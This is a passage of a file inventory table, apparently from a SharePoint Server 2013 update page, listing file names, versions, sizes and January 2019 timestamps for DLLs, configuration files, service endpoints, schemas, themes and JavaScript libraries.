\nxlsrv.stsom.dll| microsoft.sharepoint.dll| 15.0.5109.1000| 26845472| 30-Jan-19| 02:28 \nstsomdr.dll| microsoft.sharepoint.intl.dll| 15.0.4987.1000| 1267432| 27-Jan-19| 11:06 \nbdcservice.svc| bdcservice.svc| | 383| 27-Jan-19| 11:06 \nbdcwebclient.config| client.config| | 2125| 27-Jan-19| 11:06 \nbdcserviceweb.config| web.config| | 3156| 27-Jan-19| 11:06 \nsecuritytokenclientconfig| client.config| | 3448| 27-Jan-19| 11:06 \nsecuritytokenconfig| web.config| | 6235| 27-Jan-19| 11:06 \nsecuritytokensvc| securitytoken.svc| | 443| 27-Jan-19| 11:06 \nwintokcachesvc| windowstokencache.svc| | 395| 27-Jan-19| 11:06 \nsubscriptionsettingsclientconfig| client.config| | 2369| 27-Jan-19| 11:06 \nsubscriptionsettingsservicesvc| subscriptionsettings.svc| | 367| 27-Jan-19| 11:06 \nsubscriptionsettingsserviceconfig| web.config| | 2647| 27-Jan-19| 11:06 \ntopologyclientconfig| client.config| | 982| 27-Jan-19| 11:07 \ntopologyservicesvc| topology.svc| | 347| 27-Jan-19| 11:07 \ntopologyserviceconfig| web.config| | 1604| 27-Jan-19| 11:07 \nusercodeweb.cfg| web.config| | 1002| 27-Jan-19| 11:07 \nweb.cfg| web.config| | 64941| 27-Jan-19| 11:06 \nweb.cfg_0003| web.config| | 258| 27-Jan-19| 11:07 \nstsap.dll| microsoft.sharepoint.applicationpages.dll| 15.0.5085.1000| 1488168| 27-Jan-19| 11:07 \nstsomsec.dll| microsoft.sharepoint.security.dll| 15.0.4420.1017| 16512| 27-Jan-19| 02:58 \nstsomsec.dll_0001| microsoft.sharepoint.security.dll| 15.0.4420.1017| 16512| 27-Jan-19| 02:58 \nxlsrv.spsec.dll| microsoft.sharepoint.security.dll| 15.0.4420.1017| 16512| 27-Jan-19| 02:58 \nsppimps.xml| sharepointpermission.impersonate.xml| | 207| 27-Jan-19| 11:06 \nsppom.xml| sharepointpermission.objectmodel.xml| | 207| 27-Jan-19| 11:06 \nsppusog.xml| sharepointpermission.unsafesaveonget.xml| | 211| 27-Jan-19| 11:06 \nwssmedtr.cfg| wss_mediumtrust.config| | 13782| 27-Jan-19| 11:06 \nwssmintr.cfg| wss_minimaltrust.config| | 9149| 27-Jan-19| 11:06 \nusercode.cfg| wss_usercode.config| | 5855| 27-Jan-19| 11:06 \nsub.amx| alerts.asmx| | 88| 27-Jan-19| 11:06 \nsubdisco.asx| alertsdisco.aspx| | 1313| 27-Jan-19| 11:06 \nsubwsdl.asx| alertswsdl.aspx| | 8824| 27-Jan-19| 11:06 \nauth.amx| authentication.asmx| | 96| 27-Jan-19| 11:06 \nautdisco.asx| authenticationdisco.aspx| | 1301| 27-Jan-19| 11:06 \nautwsdl.asx| authenticationwsdl.aspx| | 5968| 27-Jan-19| 11:06 \nbdcadminservice.svc| bdcadminservice.svc| | 332| 27-Jan-19| 11:06 \nbdcexecutionservice.svc| bdcremoteexecutionservice.svc| | 197| 27-Jan-19| 11:06 \nbdcresolverpickerservice.svc| bdcresolverpickerservice.svc| | 402| 27-Jan-19| 11:06 \ncellstorage.https.svc| cellstorage.https.svc| | 205| 27-Jan-19| 11:06 \ncellstorage.svc| cellstorage.svc| | 200| 27-Jan-19| 11:06 \ncopy.amx| copy.asmx| | 86| 27-Jan-19| 11:06 \ncopdisco.asx| copydisco.aspx| | 1281| 27-Jan-19| 11:06 \ncopwsdl.asx| copywsdl.aspx| | 11267| 27-Jan-19| 11:06 \ndiagnostics.amx| diagnostics.asmx| | 103| 27-Jan-19| 11:06 \ndiagdata.svc| diagnosticsdata.svc| | 391| 27-Jan-19| 11:06 \ndiagnosticsdisco.asx| diagnosticsdisco.aspx| | 1329| 27-Jan-19| 11:06 \ndiagnosticswsdl.asx| diagnosticswsdl.aspx| | 4677| 27-Jan-19| 11:06 \ndocumentsharing.svc| documentsharing.svc| | 331| 27-Jan-19| 11:06 \ndspsts.amx| dspsts.asmx| | 179| 27-Jan-19| 11:07 \ndspstsdi.asx_0001| dspstsdisco.aspx| | 1289| 27-Jan-19| 11:07 \ndspstsws.asx_0001| dspstswsdl.aspx| | 10966| 27-Jan-19| 11:07 \ndws.amx| dws.asmx| | 85| 27-Jan-19| 11:06 \ndwsdisco.asx| dwsdisco.aspx| | 1287| 27-Jan-19| 11:06 \ndwswsdl.asx| dwswsdl.aspx| | 20223| 27-Jan-19| 11:06 \nexcelrest.asx| excelrest.aspx| | 202| 27-Jan-19| 11:06 \nexportwp.asx| exportwp.aspx| | 498| 27-Jan-19| 11:07 \nexpurlwp.asx| expurlwp.aspx| | 243| 27-Jan-19| 11:07 \nforms.amx| forms.asmx| | 87| 27-Jan-19| 11:06 \nfordisco.asx| formsdisco.aspx| | 1283| 27-Jan-19| 11:06 \nforwsdl.asx| formswsdl.aspx| | 5644| 27-Jan-19| 11:06 \nimaging.amx| imaging.asmx| | 89| 27-Jan-19| 11:06 \nimadisco.asx| imagingdisco.aspx| | 1295| 27-Jan-19| 11:06 \nimawsdl.asx| imagingwsdl.aspx| | 24227| 27-Jan-19| 11:06 \nlistdata.svc| listdata.svc| | 392| 27-Jan-19| 11:06 \nlists.amx| lists.asmx| | 87| 27-Jan-19| 11:06 \nlisdisco.asx| listsdisco.aspx| | 1283| 27-Jan-19| 11:06 \nliswsdl.asx| listswsdl.aspx| | 73094| 27-Jan-19| 11:06 \nmeetings.amx| meetings.asmx| | 90| 27-Jan-19| 11:06 \nmeedisco.asx| meetingsdisco.aspx| | 1307| 27-Jan-19| 11:06 \nmeewsdl.asx| meetingswsdl.aspx| | 26921| 27-Jan-19| 11:06 \nonenote.ashx| onenote.ashx| | 89| 27-Jan-19| 11:06 \npeople.amx| people.asmx| | 88| 27-Jan-19| 11:06 \nppldisco.asx| peopledisco.aspx| | 1285| 27-Jan-19| 11:06 \npplwsdl.asx| peoplewsdl.aspx| | 9093| 27-Jan-19| 11:06 \nperms.amx| permissions.asmx| | 94| 27-Jan-19| 11:06 \nperdisco.asx| permissionsdisco.aspx| | 1315| 27-Jan-19| 11:06 \nperwsdl.asx| permissionswsdl.aspx| | 13698| 27-Jan-19| 11:06 \nsharedaccess.amx| sharedaccess.asmx| | 94| 27-Jan-19| 11:06 \nsharedaccessdisco.asx| sharedaccessdisco.aspx| | 1297| 27-Jan-19| 11:06 \nsharedaccesswsdl.asx| sharedaccesswsdl.aspx| | 4036| 27-Jan-19| 11:06 \nsharepointemailws.amx| sharepointemailws.asmx| | 98| 27-Jan-19| 11:06 \nsharepointemailwsdisco.asx| sharepointemailwsdisco.aspx| | 1349| 27-Jan-19| 11:06 \nsharepointemailwswsdl.asx| sharepointemailwswsdl.aspx| | 25799| 27-Jan-19| 11:06 \nsitedata.amx| sitedata.asmx| | 90| 27-Jan-19| 11:06 \nsdadisco.asx| sitedatadisco.aspx| | 1289| 27-Jan-19| 11:06 \nsdawsdl.asx| sitedatawsdl.aspx| | 36711| 27-Jan-19| 11:06 \nsites.amx| sites.asmx| | 87| 27-Jan-19| 11:06 \nsitdisco.asx| sitesdisco.aspx| | 1283| 27-Jan-19| 11:06 \nsitwsdl.asx| siteswsdl.aspx| | 22976| 27-Jan-19| 11:06 \nspclaimproviderwebservice.https.svc| spclaimproviderwebservice.https.svc| | 115| 27-Jan-19| 11:06 \nspclaimproviderwebservice.svc| spclaimproviderwebservice.svc| | 110| 27-Jan-19| 11:06 \nspdisco.asx| spdisco.aspx| | 11428| 27-Jan-19| 11:06 \nspsearchdisco.asx| spsearchdisco.aspx| | 1319| 27-Jan-19| 11:06 \nspsearchwsdl.asx| spsearchwsdl.aspx| | 8629| 27-Jan-19| 11:06 \nspsecuritytokenservice.svc| spsecuritytokenservice.svc| | 476| 27-Jan-19| 11:06 \nweb.config_sts| web.config| | 4845| 27-Jan-19| 11:06 \nusergrp.amx| usergroup.asmx| | 92| 27-Jan-19| 11:06 \nusedisco.asx| usergroupdisco.aspx| | 1311| 27-Jan-19| 11:06 \nusewsdl.asx| usergroupwsdl.aspx| | 82880| 27-Jan-19| 11:06 \nversions.amx| versions.asmx| | 90| 27-Jan-19| 11:06 \nverdisco.asx| versionsdisco.aspx| | 1289| 27-Jan-19| 11:06 \nverwsdl.asx| versionswsdl.aspx| | 9474| 27-Jan-19| 11:06 \nviews.amx| views.asmx| | 87| 27-Jan-19| 11:06 \nviedisco.asx| viewsdisco.aspx| | 1283| 27-Jan-19| 11:06 \nviewsdl.asx| viewswsdl.aspx| | 25520| 27-Jan-19| 11:06 \nweb.cfg_0010| web.config| | 13944| 27-Jan-19| 11:06 \nwppages.amx| webpartpages.asmx| | 186| 27-Jan-19| 11:06 \nwppdisco.asx| webpartpagesdisco.aspx| | 1315| 27-Jan-19| 11:06 \nwppwsdl.asx| webpartpageswsdl.aspx| | 56408| 27-Jan-19| 11:06 \nwebs.amx| webs.asmx| | 86| 27-Jan-19| 11:06 \nwebdisco.asx| websdisco.aspx| | 1281| 27-Jan-19| 11:06 \nwebwsdl.asx| webswsdl.aspx| | 41302| 27-Jan-19| 11:06 \nwopi.ashx| wopi.ashx| | 86| 27-Jan-19| 11:06 \nwsdisco.asx| wsdisco.aspx| | 1806| 27-Jan-19| 11:06 \nwswsdl.asx| wswsdl.aspx| | 1904| 27-Jan-19| 11:06 \nstssoap.dll| stssoap.dll| 15.0.4981.1000| 553704| 27-Jan-19| 11:06 \nsubsetproxy.dll_0001| microsoft.sharepoint.subsetproxy.dll| 15.0.5085.1000| 848144| 27-Jan-19| 11:06 \nsubsetshim.dll_0001| microsoft.sharepoint.dll| 15.900.5085.1000| 2139416| 27-Jan-19| 11:06 \nalerttmp.xml| alerttemplates.xml| | 458234| 27-Jan-19| 11:07 \nalerttms.xml| alerttemplates_sms.xml| | 51863| 27-Jan-19| 11:07 \ndefault.aspx_app| default.aspx| | 1168| 27-Jan-19| 11:06 \nonet.xml_app| onet.xml| | 4911| 27-Jan-19| 11:06 \ndefault.aspx_appcatalog| default.aspx| | 4026| 27-Jan-19| 11:06 \nonet.xml_appcatalog| onet.xml| | 6262| 27-Jan-19| 11:06 \napphostwebfeatures.xsd| apphostwebfeatures.xsd| | 17579| 27-Jan-19| 11:07 \nappmanifest.xsd| appmanifest.xsd| | 20392| 27-Jan-19| 11:07 \napppartconfig.xsd| apppartconfig.xsd| | 2826| 27-Jan-19| 11:07 \nappsolution.xsd| appsolution.xsd| | 101258| 27-Jan-19| 11:07 \nblog.xsl| blog.xsl| | 37369| 27-Jan-19| 11:07 \nonet.xml_blog| onet.xml| | 6549| 27-Jan-19| 11:06 \ncamlqry.xsd| camlquery.xsd| | 10890| 27-Jan-19| 11:07 \ncamlview.xsd| camlview.xsd| | 19014| 27-Jan-19| 11:07 \ncpchkers.xsd| capabilitycheckers.xsd| | 1924| 27-Jan-19| 11:07 \nschema.xml_0010| schema.xml| | 16975| 27-Jan-19| 11:06 \ndmslstallitems_aspx| allitems.aspx| | 2731| 27-Jan-19| 11:06 \ndmslstcreatedls_aspx| createdls.aspx| | 2731| 27-Jan-19| 11:06 \ndmslstdeletedls_aspx| deletedls.aspx| | 2731| 27-Jan-19| 11:06 \ndmslstdispform_aspx| dispform.aspx| | 4190| 27-Jan-19| 11:06 \ndmslsteditform_aspx| editform.aspx| | 4167| 27-Jan-19| 11:06 \ndmslstmodifydls_aspx| modifydls.aspx| | 2731| 27-Jan-19| 11:06 \ndmslstnewform_aspx| newform.aspx| | 4197| 27-Jan-19| 11:06 \ndmslstschema_xml| schema.xml| | 22840| 27-Jan-19| 11:06 \ntopology.dwp| topologyview.dwp| | 495| 27-Jan-19| 11:06 \nschema.xml_1221| schema.xml| | 9478| 27-Jan-19| 11:06 \nschema.xml_1220| schema.xml| | 7583| 27-Jan-19| 11:06 \napplications.asx_0014| applications.aspx| | 3724| 27-Jan-19| 11:06 \napps.asx_0014| apps.aspx| | 3708| 27-Jan-19| 11:06 \nbackups.asx_0014| backups.aspx| | 3714| 27-Jan-19| 11:06 \nconfigurationwizards.asx_0014| configurationwizards.aspx| | 3740| 27-Jan-19| 11:06 \ndefault.asx_0014| default.aspx| | 5230| 27-Jan-19| 11:06 \ngenappsettings.asx_0014| generalapplicationsettings.aspx| | 3753| 27-Jan-19| 11:06 \nmonitoring.asx_0014| monitoring.aspx| | 3720| 27-Jan-19| 11:06 \no365config.asx_0015| office365configuration.aspx| | 3725| 27-Jan-19| 11:06 \nsecurity.asx_0014| security.aspx| | 3716| 27-Jan-19| 11:06 \nsysset.asx_0014| systemsettings.aspx| | 3728| 27-Jan-19| 11:06 \nupgandmig.asx_0014| upgradeandmigration.aspx| | 3738| 27-Jan-19| 11:06 \nonet.xml_0006| onet.xml| | 10552| 27-Jan-19| 11:06 \ncoredefs.xsd| coredefinitions.xsd| | 3308| 27-Jan-19| 11:07 \ndeplset.xsd| deploymentexportsettings.xsd| | 4494| 27-Jan-19| 11:07 \ndepllook.xsd| deploymentlookuplistmap.xsd| | 1632| 27-Jan-19| 11:07 \ndepl.xsd| deploymentmanifest.xsd| | 79362| 27-Jan-19| 11:07 \ndeplreq.xsd| deploymentrequirements.xsd| | 1262| 27-Jan-19| 11:07 \ndeplroot.xsd| deploymentrootobjectmap.xsd| | 1642| 27-Jan-19| 11:07 \ndeplsys.xsd| deploymentsystemdata.xsd| | 3065| 27-Jan-19| 11:07 \ndepluser.xsd| deploymentusergroupmap.xsd| | 3386| 27-Jan-19| 11:07 \ndeplform.xsd| deploymentviewformslist.xsd| | 877| 27-Jan-19| 11:07 \ndip.css| dip.css| | 1781| 27-Jan-19| 11:07 \ndip.css_14| dip.css| | 1781| 27-Jan-19| 11:07 \ndip.html| dip.html| | 4328| 27-Jan-19| 11:07 \ndip.html_14| dip.html| | 4328| 27-Jan-19| 11:07 \ndip.js| dip.js| | 62819| 27-Jan-19| 11:07 \ndip.js_14| dip.js| | 62819| 27-Jan-19| 11:07 \nmessagebanner.js| messagebanner.js| | 4968| 27-Jan-19| 11:07 \nmessagebanner.js_14| messagebanner.js| | 4968| 27-Jan-19| 11:07 \ndocicon.xml| docicon.xml| | 16363| 27-Jan-19| 11:07 \nwkpstd.asx_wiki| wkpstd.aspx| | 3356| 27-Jan-19| 11:06 \nfldtypes.xml| fldtypes.xml| | 256018| 27-Jan-19| 11:07 \nfldtypes.xsl| fldtypes.xsl| | 133234| 27-Jan-19| 11:07 \nftacpl.xml| fldtypes_accessrequestspermissionlevel.xml| | 753| 27-Jan-19| 11:07 \nfluidapp.xsd| fluidapplicationsettings.xsd| | 2721| 27-Jan-19| 11:07 \nformxml.xsl| formxml.xsl| | 20914| 27-Jan-19| 11:07 \ngbwdef.asc| gbwdefaulttemplates.ascx| | 57071| 27-Jan-19| 11:06 \ngbwmdef.asc| gbwmobiledefaulttemplates.ascx| | 13722| 27-Jan-19| 11:06 \ndispsr.asx_mobile| dispsr.aspx| | 2702| 27-Jan-19| 11:07 \neditsr.asx_mobile| editsr.aspx| | 2574| 27-Jan-19| 11:07 \nnewsr.asx_mobile| newsr.aspx| | 2570| 27-Jan-19| 11:07 \nviewdaily.asx_mobile| viewdaily.aspx| | 4994| 27-Jan-19| 11:07 \nwaview.asx_mobile| waview.aspx| | 2986| 27-Jan-19| 11:07 \ndefault.aspx_gbw| default.aspx| | 3458| 27-Jan-19| 11:06 \nonet.xml_gbw| onet.xml| | 10911| 27-Jan-19| 11:06 \nschema.xml_appdatalib| schema.xml| | 314| 27-Jan-19| 11:07 \ndefault.spc| default.spcolor| | 5243| 27-Jan-19| 11:07 \npalette001.spcolor| palette001.spcolor| | 5243| 27-Jan-19| 11:07 \npalette002.spcolor| palette002.spcolor| | 5251| 27-Jan-19| 11:07 \npalette003.spcolor| palette003.spcolor| | 5247| 27-Jan-19| 11:07 \npalette004.spcolor| palette004.spcolor| | 5246| 27-Jan-19| 11:07 \npalette005.spcolor| palette005.spcolor| | 5247| 27-Jan-19| 11:07 \npalette006.spcolor| palette006.spcolor| | 5249| 27-Jan-19| 11:07 \npalette007.spcolor| palette007.spcolor| | 5251| 27-Jan-19| 11:07 \npalette008.spcolor| palette008.spcolor| | 5251| 27-Jan-19| 11:07 \npalette009.spcolor| palette009.spcolor| | 5248| 27-Jan-19| 11:07 \npalette010.spcolor| palette010.spcolor| | 5250| 27-Jan-19| 11:07 \npalette011.spcolor| palette011.spcolor| | 5248| 27-Jan-19| 11:07 \npalette012.spcolor| palette012.spcolor| | 5243| 27-Jan-19| 11:07 \npalette013.spcolor| palette013.spcolor| | 5243| 27-Jan-19| 11:07 \npalette014.spcolor| palette014.spcolor| | 5243| 27-Jan-19| 11:07 \npalette015.spcolor| palette015.spcolor| | 5243| 27-Jan-19| 11:07 \npalette016.spcolor| palette016.spcolor| | 5243| 27-Jan-19| 11:07 \npalette017.spcolor| palette017.spcolor| | 5243| 27-Jan-19| 11:07 \npalette018.spcolor| palette018.spcolor| | 5243| 27-Jan-19| 11:07 \npalette019.spcolor| palette019.spcolor| | 5243| 27-Jan-19| 11:07 \npalette020.spcolor| palette020.spcolor| | 5243| 27-Jan-19| 11:07 \npalette021.spcolor| palette021.spcolor| | 5243| 27-Jan-19| 11:07 \npalette022.spcolor| palette022.spcolor| | 5246| 27-Jan-19| 11:07 \npalette023.spcolor| palette023.spcolor| | 5246| 27-Jan-19| 11:07 \npalette024.spcolor| palette024.spcolor| | 5246| 27-Jan-19| 11:07 \npalette025.spcolor| palette025.spcolor| | 5246| 27-Jan-19| 11:07 \npalette026.spcolor| palette026.spcolor| | 5246| 27-Jan-19| 11:07 \npalette027.spcolor| palette027.spcolor| | 5246| 27-Jan-19| 11:07 \npalette028.spcolor| palette028.spcolor| | 5246| 27-Jan-19| 11:07 \npalette029.spcolor| palette029.spcolor| | 5246| 27-Jan-19| 11:07 \npalette030.spcolor| palette030.spcolor| | 5246| 27-Jan-19| 11:07 \npalette031.spcolor| palette031.spcolor| | 5246| 27-Jan-19| 11:07 \npalette032.spcolor| palette032.spcolor| | 5245| 27-Jan-19| 11:07 \npalette1.spcolor| palette1.spcolor| | 3110| 27-Jan-19| 11:07 \npalette2.spcolor| palette2.spcolor| | 3121| 27-Jan-19| 11:07 \npalette3.spcolor| palette3.spcolor| | 3122| 27-Jan-19| 11:07 \npalette4.spcolor| palette4.spcolor| | 3121| 27-Jan-19| 11:07 \npalette5.spcolor| palette5.spcolor| | 3116| 27-Jan-19| 11:07 \npalette6.spcolor| palette6.spcolor| | 3118| 27-Jan-19| 11:07 \nschema.xml_designlib| schema.xml| | 4033| 27-Jan-19| 11:07 \nfnt001.spfont| fontscheme001.spfont| | 15354| 27-Jan-19| 11:07 \nfnt002.spfont| fontscheme002.spfont| | 13545| 27-Jan-19| 11:07 \nfnt003.spfont| fontscheme003.spfont| | 15461| 27-Jan-19| 11:07 \nfnt004.spfont| fontscheme004.spfont| | 15884| 27-Jan-19| 11:07 \nfnt005.spfont| fontscheme005.spfont| | 16065| 27-Jan-19| 11:07 \nfnt006.spfont| fontscheme006.spfont| | 14209| 27-Jan-19| 11:07 \nfnt007.spfont| fontscheme007.spfont| | 15880| 27-Jan-19| 11:07 \ndefault.spf| default.spfont| | 13976| 27-Jan-19| 11:07 \nsharepoint.spfont| sharepointpersonality.spfont| | 13976| 27-Jan-19| 11:07 \nschema.xml_listtemp| schema.xml| | 80036| 27-Jan-19| 11:06 \nupload.asx_listtemp| upload.aspx| | 6141| 27-Jan-19| 11:06 \napp.mas_mplib| app.master| | 19062| 27-Jan-19| 11:06 \ndefault.mas| default.master| | 26292| 27-Jan-19| 11:06 \ndefault.mas_mplib| default.master| | 26292| 27-Jan-19| 11:06 \nlv3.mas| layoutsv3.master| | 13587| 27-Jan-19| 11:07 \nminimal.mas| minimal.master| | 8825| 27-Jan-19| 11:06 \nminimal.mas_mplib| minimal.master| | 8825| 27-Jan-19| 11:06 \nmwsdef.mas_mplib| mwsdefault.master| | 26950| 27-Jan-19| 11:06 \nmwsv15.mas_mplib| mwsdefaultv15.master| | 30580| 27-Jan-19| 11:06 \nmwsv4.mas_mplib| mwsdefaultv4.master| | 27509| 27-Jan-19| 11:06 \noslo.mas_mplib| oslo.master| | 29416| 27-Jan-19| 11:06 \noslo.prev| oslo.preview| | 10159| 27-Jan-19| 11:06 \nschema.xml_mplib| schema.xml| | 84417| 27-Jan-19| 11:06 \nseattle.mas| seattle.master| | 29925| 27-Jan-19| 11:06 \nseattle.mas_mplib| seattle.master| | 29925| 27-Jan-19| 11:06 \nseattle.prev| seattle.preview| | 10725| 27-Jan-19| 11:06 \nupload.asp_mplib| upload.aspx| | 5911| 27-Jan-19| 11:06 \nv4.mas| v4.master| | 26916| 27-Jan-19| 11:06 \nv4.mas_mplib| v4.master| | 26916| 27-Jan-19| 11:06 \nactivate.asx_solutionslib| activate.aspx| | 3861| 27-Jan-19| 11:07 \nschema.xml_solutionslib| schema.xml| | 83463| 27-Jan-19| 11:07 \nupload.asx_solutionslib| upload.aspx| | 5914| 27-Jan-19| 11:07 \nviewpage.asx_solutionslib| viewpage.aspx| | 2718| 27-Jan-19| 11:07 \nschema.xml_themeslib| schema.xml| | 1849| 27-Jan-19| 11:07 \nschema.xml_users| schema.xml| | 392079| 27-Jan-19| 11:06 \neditdlg.htm_webtemp| editdlg.htm| | 4892| 27-Jan-19| 11:06 \nschema.xml_webtemp| schema.xml| | 166908| 27-Jan-19| 11:06 \nupload.asx_webtemp| upload.aspx| | 6141| 27-Jan-19| 11:06 \nschema.xml_wplib| schema.xml| | 92345| 27-Jan-19| 11:07 \nupload.asx_wplib| upload.aspx| | 5914| 27-Jan-19| 11:07 \ncmdui.xml_global| cmdui.xml| | 631119| 27-Jan-19| 11:06 \nonet.xml_global| onet.xml| | 313439| 27-Jan-19| 11:06 \nstdview.xml_global| stdview.xml| | 54852| 27-Jan-19| 11:06 \nvwstyles.xml_global| vwstyles.xml| | 422824| 27-Jan-19| 11:06 \ngroupbd.xsl| groupboard.xsl| | 14233| 27-Jan-19| 11:07 \nhtrinfo.xml_0001| htmltransinfo.xml| | 5136| 27-Jan-19| 11:07 \ndefault.asx_forms| default.aspx| | 2788| 27-Jan-19| 11:06 \nweb.cfg_forms| web.config| | 216| 27-Jan-19| 11:06 \ndefault.asx_multilogin| default.aspx| | 2284| 27-Jan-19| 11:06 \nweb.cfg_multilogin| web.config| | 216| 27-Jan-19| 11:06 \ndefault.asx_trust| default.aspx| | 530| 27-Jan-19| 11:06 \nweb.cfg_trust| web.config| | 2190| 27-Jan-19| 11:06 \ndefault.asx_windows| default.aspx| | 522| 27-Jan-19| 11:06 \nweb.cfg_windows| web.config| | 214| 27-Jan-19| 11:06 \ninternal.xsl| internal.xsl| | 11095| 27-Jan-19| 11:07 \naccreqctl.debug.js| accessrequestscontrol.debug.js| | 18815| 27-Jan-19| 11:06 \naccreqctl.js| accessrequestscontrol.js| | 10651| 27-Jan-19| 11:06 \naccreqctl.xml| accessrequestscontrol.xml| | 103| 27-Jan-19| 11:07 \naccreqviewtmpl.debug.js| accessrequestsviewtemplate.debug.js| | 28650| 27-Jan-19| 11:06 \naccreqviewtmpl.js| accessrequestsviewtemplate.js| | 11376| 27-Jan-19| 11:06 \naccreqviewtmpl.xml| accessrequestsviewtemplate.xml| | 108| 27-Jan-19| 11:07 \nappcatalogfieldtemplate.debug.js| appcatalogfieldtemplate.debug.js| | 9040| 27-Jan-19| 11:06 \nappcatalogfieldtemplate.js| appcatalogfieldtemplate.js| | 3342| 27-Jan-19| 11:06 \nappdeveloperdash.debug.js| appdeveloperdash.debug.js| | 22542| 27-Jan-19| 11:06 \nappdeveloperdash.js| appdeveloperdash.js| | 11197| 27-Jan-19| 11:06 \naddb.xml| appdeveloperdash.xml| | 158| 27-Jan-19| 11:07 \nautofill.debug.js| autofill.debug.js| | 18404| 27-Jan-19| 11:06 \nautofill.js| autofill.js| | 10322| 27-Jan-19| 11:06 \nautohostedlicensingtemplates.debug.js| autohostedlicensingtemplates.debug.js| | 20576| 27-Jan-19| 11:06 \nautohostedlicensingtemplates.js| autohostedlicensingtemplates.js| | 8623| 27-Jan-19| 11:06 \nautohostedlicensingtemplates.xml| autohostedlicensingtemplates.xml| | 110| 27-Jan-19| 11:07 \nbform.debug.js| bform.debug.js| | 459758| 27-Jan-19| 11:06 \nbform.js| bform.js| | 258656| 27-Jan-19| 11:06 \nbform.xml| bform.xml| | 87| 27-Jan-19| 11:07 \nblank.debug.js| blank.debug.js| | 164| 27-Jan-19| 11:06 \nblank.js| blank.js| | 119| 27-Jan-19| 11:06 \ncallout.debug.js| callout.debug.js| | 84762| 27-Jan-19| 11:06 \ncallout.js| callout.js| | 26526| 27-Jan-19| 11:06 \ncallout.xml| callout.xml| | 155| 27-Jan-19| 11:07 \nchoicebuttonfieldtemplate.debug.js| choicebuttonfieldtemplate.debug.js| | 5782| 27-Jan-19| 11:06 \nchoicebuttonfieldtemplate.js| choicebuttonfieldtemplate.js| | 2388| 27-Jan-19| 11:06 \ncbft.xml| choicebuttonfieldtemplate.xml| | 97| 27-Jan-19| 11:07 \nclientforms.debug.js| clientforms.debug.js| | 153736| 27-Jan-19| 11:06 \nclientforms.js| clientforms.js| | 77613| 27-Jan-19| 11:06 \nclientforms.xml| clientforms.xml| | 145| 27-Jan-19| 11:07 \nclientpeoplepicker.debug.js| clientpeoplepicker.debug.js| | 77565| 27-Jan-19| 11:06 \nclientpeoplepicker.js| clientpeoplepicker.js| | 41210| 27-Jan-19| 11:06 \nclientrenderer.debug.js| clientrenderer.debug.js| | 23510| 27-Jan-19| 11:06 \nclientrenderer.js| clientrenderer.js| | 9805| 27-Jan-19| 11:06 \nclienttemplates.debug.js| clienttemplates.debug.js| | 294341| 27-Jan-19| 11:06 \nclienttemplates.js| clienttemplates.js| | 150382| 27-Jan-19| 11:06 \nclienttemplates.xml| clienttemplates.xml| | 101| 27-Jan-19| 11:07 \ncommonvalidation.debug.js| commonvalidation.debug.js| | 5376| 27-Jan-19| 11:06 \ncomval.js| commonvalidation.js| | 3369| 27-Jan-19| 11:06 \ncommonvalidation.xml| commonvalidation.xml| | 98| 27-Jan-19| 11:07 \ncore.debug.js| core.debug.js| | 636461| 27-Jan-19| 11:06 \ncore.js_0001| core.js| | 331668| 27-Jan-19| 11:06 \ncore.xml| core.xml| | 86| 27-Jan-19| 11:07 \ndatepicker.debug.js| datepicker.debug.js| | 48715| 27-Jan-19| 11:06 \ndatepick.js| datepicker.js| | 27099| 27-Jan-19| 11:06 \ndatepicker.xml| datepicker.xml| | 92| 27-Jan-19| 11:07 \ndesigngallery.debug.js| designgallery.debug.js| | 46223| 27-Jan-19| 11:06 \ndesigngallery.js| designgallery.js| | 28550| 27-Jan-19| 11:06 \ndesigngallery.xml| designgallery.xml| | 95| 27-Jan-19| 11:07 \ndevdash.debug.js| devdash.debug.js| | 86004| 27-Jan-19| 11:06 \ndevdash.js| devdash.js| | 36366| 27-Jan-19| 11:06 \ndragdrop.debug.js| dragdrop.debug.js| | 160299| 27-Jan-19| 11:06 \ndragdrop.js| dragdrop.js| | 85346| 27-Jan-19| 11:06 \ndragdrop.xml| dragdrop.xml| | 90| 27-Jan-19| 11:07 \nentityeditor.debug.js| entityeditor.debug.js| | 73212| 27-Jan-19| 11:06 \nentityeditor.js| entityeditor.js| | 38537| 27-Jan-19| 11:06 \nfilepreview.debug.js| filepreview.debug.js| | 18731| 27-Jan-19| 11:06 \nfilepreview.js| filepreview.js| | 10123| 27-Jan-19| 11:06 \nfilepreview.xml| filepreview.xml| | 91| 27-Jan-19| 11:07 \nfoldhyperlink.debug.js| foldhyperlink.debug.js| | 3360| 27-Jan-19| 11:06 \nfoldhyperlink.js| foldhyperlink.js| | 1544| 27-Jan-19| 11:06 \nform.debug.js| form.debug.js| | 240967| 27-Jan-19| 11:06 \nform.js| form.js| | 128992| 27-Jan-19| 11:06 \nform.xml| form.xml| | 86| 27-Jan-19| 11:07 \nganttscript.debug.js| ganttscript.debug.js| | 8826| 27-Jan-19| 11:06 \nganttscr.js| ganttscript.js| | 4787| 27-Jan-19| 11:06 \ngeolocationfieldtemplate.debug.js| geolocationfieldtemplate.debug.js| | 40185| 27-Jan-19| 11:06 \ngeolocationfieldtemplate.js| geolocationfieldtemplate.js| | 14886| 27-Jan-19| 11:06 \nglft.xml| geolocationfieldtemplate.xml| | 88| 27-Jan-19| 11:07 \ngroupboard.debug.js| groupboard.debug.js| | 15630| 27-Jan-19| 11:06 \ngroupboard.js| groupboard.js| | 9088| 27-Jan-19| 11:06 \ngroupboard.xml| groupboard.xml| | 92| 27-Jan-19| 11:07 \ngroupeditempicker.debug.js| groupeditempicker.debug.js| | 20302| 27-Jan-19| 11:06 \ngip.js| groupeditempicker.js| | 11630| 27-Jan-19| 11:06 \nhierarchytaskslist.debug.js| hierarchytaskslist.debug.js| | 59315| 27-Jan-19| 11:06 \nhierarchytaskslist.js| hierarchytaskslist.js| | 19494| 27-Jan-19| 11:06 \nhierarchytaskslist.xml| hierarchytaskslist.xml| | 57| 27-Jan-19| 11:07 \nimglib.debug.js| imglib.debug.js| | 85024| 27-Jan-19| 11:06 \nimglib.js| imglib.js| | 50445| 27-Jan-19| 11:06 \nimglib.xml| imglib.xml| | 88| 27-Jan-19| 11:07 \ninit.debug.js| init.debug.js| | 302967| 27-Jan-19| 11:06 \ninit.js_0001| init.js| | 161242| 27-Jan-19| 11:06 \ninplview.debug.js| inplview.debug.js| | 136957| 27-Jan-19| 11:06 \ninplview.js| inplview.js| | 69236| 27-Jan-19| 11:06 \ninplview.xml| inplview.xml| | 158| 27-Jan-19| 11:07 \njsgrid.debug.js| jsgrid.debug.js| | 1164592| 27-Jan-19| 11:06 \njsgrid.gantt.debug.js| 